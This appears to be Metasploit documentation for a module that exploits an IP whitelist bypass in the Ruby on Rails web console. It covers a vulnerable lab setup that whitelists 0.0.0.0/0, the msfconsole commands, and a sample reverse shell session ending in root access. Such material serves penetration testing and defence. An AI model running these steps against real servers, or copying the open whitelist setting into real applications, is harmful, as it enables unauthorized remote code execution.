## Description

 This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x.
 This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range.

## Verification Steps

**Prerequisites:**

```
gem install rails -v 4.2.6
rails new taco
cd taco
vim config/environments/development.rb
```

Add the following line just before the final `end` tag:

```config.web_console.whitelisted_ips = %w(0.0.0.0/0)```


```
bundle
rails server
```

**Installing nodejs:**

```
sudo apt-get install nodejs
```

**Launch msfconsole:**

1. Do: ```use exploit/multi/http/rails_web_console_v2_code_exec```
2. Do: ```set RHOST [IP]```
3. Do: ```set RPORT [Port]```
4. Do: ```run```

## Scenarios

### Rails version 4.2.6

```
msf > use exploit/multi/http/rails_web_console_v2_code_exec 
msf exploit(rails_web_console_v2_code_exec) > set RHOST 192.168.0.106
msf exploit(rails_web_console_v2_code_exec) > set RPORT 35678
msf exploit(rails_web_console_v2_code_exec) > run

[*] Started reverse TCP handler on 192.168.0.102:4444
[*] Sending payload to /__web_console/repl_sessions/d89c2f96387f4b9dd612c0abb7c06577
[*] Command shell session 1 opened (192.168.0.102:4444 -> 192.168.0.106:35678) at 2017-04-07 04:13:52 +0800

id
uid=0(root) gid=0(root) groups=0(root)
```
